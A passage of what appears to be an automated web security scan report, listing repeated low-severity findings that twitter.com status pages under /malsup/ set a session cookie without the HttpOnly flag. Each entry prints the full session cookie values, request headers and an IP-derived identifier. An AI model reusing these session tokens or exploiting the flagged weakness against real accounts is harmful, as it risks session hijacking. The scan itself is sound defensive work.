_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjcwNTIyMDAwOTk4NDoMY3NyZl9pZCIlNDAwZTU3MDIwZTI2%250AOGRjM2FkZTAwZDZiN2FkNDkxZTY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--f11730b84ce50cbf6bd93caab79b94724f2f389a; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28172705220009984 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.124. http://twitter.com/malsup/status/28172927228706816 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/28172927228706816

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjkyNzIyODcwNjgxNjoMY3NyZl9pZCIlMThlMTViODg0ZThh%250AZWQxZDY1MTRiYmFiYmUzNzlmNTU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c8db7209ce1246cbe1047e0cb576ed58c5085c73; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28172927228706816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.125. http://twitter.com/malsup/status/28176483855896578 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/28176483855896578

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3NjQ4Mzg1NTg5NjU3ODoMY3NyZl9pZCIlYmEwMDczN2YyZjhl%250AZGZlZDk2OGM2ZmRjZDJmZTM1N2M6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--2a2ab9129448d1d35a9123d4379ea42935434e7c; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28176483855896578 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.126. http://twitter.com/malsup/status/28206363616215040 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/28206363616215040

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODIwNjM2MzYxNjIxNTA0MDoMY3NyZl9pZCIlMzJhZDdhZWE4YTVi%250ANmI0N2NhYjc2Y2UzNjcwYmQ5NGQ6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--14d983691f33e1b982c79a5b234b9091c5640cfd; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28206363616215040 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.127. http://twitter.com/malsup/status/28450557672824832 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/28450557672824832

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MDU1NzY3MjgyNDgzMjoMY3NyZl9pZCIlNWU2ZTIzZGIyYjk5%250AODhkOTAwNjg4NThhZjkxOGU2MmU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e2496f1dbb064b5c8414d329ac11463253046feb; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28450557672824832 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.128. http://twitter.com/malsup/status/28451243869339648 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/28451243869339648

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MTI0Mzg2OTMzOTY0ODoMY3NyZl9pZCIlY2UxZTYzZWM1Mzhi%250ANzUwOTg5MmZhODg2NzBlNTE3ZmE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--92abfd30a75287ea7b714b4c2d719303b28dc49f; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28451243869339648 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.129. http://twitter.com/malsup/status/29343613573926913 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/29343613573926913

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0MzYxMzU3MzkyNjkxMzoMY3NyZl9pZCIlMDhhNzE0NWUzZGQy%250AYThjMGFmMzNlOGU2N2YzMWMyNmI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--d7b87ffd3961937960551fd20ef085add3dc652a; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/29343613573926913 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.130. http://twitter.com/malsup/status/29343882311372800 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/29343882311372800

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0Mzg4MjMxMTM3MjgwMDoMY3NyZl9pZCIlOTMwZjZkOTU4Nzcz%250AZmZlODFmOTdmMGIwMjJjZmMwZTk6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--4ec685a9450e1b8fefd04b4578645a1edde9bad3; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/29343882311372800 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.131. http://twitter.com/malsup/status/29510556067041280 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/29510556067041280

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTUxMDU1NjA2NzA0MTI4MDoMY3NyZl9pZCIlYjkxNjUxMjBkZmM0%250AYTJhMGUyNjZiZDRjZWFhMTg5YzQ6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--879a5af66cf85b03132a55e267e75f8e107db447; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/29510556067041280 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.132. http://twitter.com/malsup/status/29705355999055872 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/29705355999055872

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTcwNTM1NTk5OTA1NTg3MjoMY3NyZl9pZCIlNDAwZjBkMzA5YTgy%250AYzk1NGFhZGY3Y2YxMWZhNTEzNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c0d59aed3199a40c6a1fc20a84673263ba8b0524; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/29705355999055872 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.133. http://twitter.com/malsup/status/30065585396121601 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/30065585396121601

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDA2NTU4NTM5NjEyMTYwMToMY3NyZl9pZCIlNWViNDc0NjJhYjUy%250AYmJiMjUwZjk0ZjZiY2Q5NWQ2MjM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--a5345f31cffd9fbf70b4a6bddd83fd98f48576ba; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30065585396121601 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.134. http://twitter.com/malsup/status/30103594925555712 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/30103594925555712

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDEwMzU5NDkyNTU1NTcxMjoMY3NyZl9pZCIlZGQ5ZmU5ZmYzMGNm%250AMjhiMDY0MzgzM2U2NGNjMzJlMDY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--176b58f6205e5a5aa6ed8ffb4443a86e18553832; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30103594925555712 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.135. http://twitter.com/malsup/status/30232367046074369 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/30232367046074369

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDIzMjM2NzA0NjA3NDM2OToMY3NyZl9pZCIlYTM3MGRmOTZhODQz%250AM2RiNDBlMmY1M2I5OTM2NjFmYjE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e05cd9620525d156ee51f67a18a4e6ea60c33e75; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30232367046074369 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.136. http://twitter.com/malsup/status/30417132269346816 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/30417132269346816

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxNzEzMjI2OTM0NjgxNjoMY3NyZl9pZCIlYzFhNDVhNDY0ZjBj%250ANTkyYTUyYTU1YjI1ZjJjN2VmZDg6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--1619ced3ca9bc9fa08b4a84d7d647b1b47a62ad4; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30417132269346816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.137. http://twitter.com/malsup/status/30418291201679360 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/30418291201679360

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxODI5MTIwMTY3OTM2MDoMY3NyZl9pZCIlNjZjMzQ2MThjNmJl%250ANjFjN2ZmMzBjNjgyMTNiYzQ1N2Q6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--be54aaa7f049891a1ab52a41024afae2053a60f4; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30418291201679360 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.138. http://twitter.com/malsup/status/30442842241376256 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/30442842241376256

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQ0Mjg0MjI0MTM3NjI1NjoMY3NyZl9pZCIlMTdjZmE5ZGJlZjVk%250AM2JkM2I0YWIyZDA1MzE3NTdhYjE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--eff563544b6e766e02e277b4b06265fffbf2e5f3; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30442842241376256 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.139. http://twitter.com/malsup/status/30772839023910912 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/30772839023910912

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc3MjgzOTAyMzkxMDkxMjoMY3NyZl9pZCIlMzZjNjQyMjZiMjdi%250AYjEyMDg4ZmU0MGQ3MWFlM2M3M2I6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--31a7ec0c01289e70c33472c98a7cbc57bf724c53; domain=.twitter.com; path=/

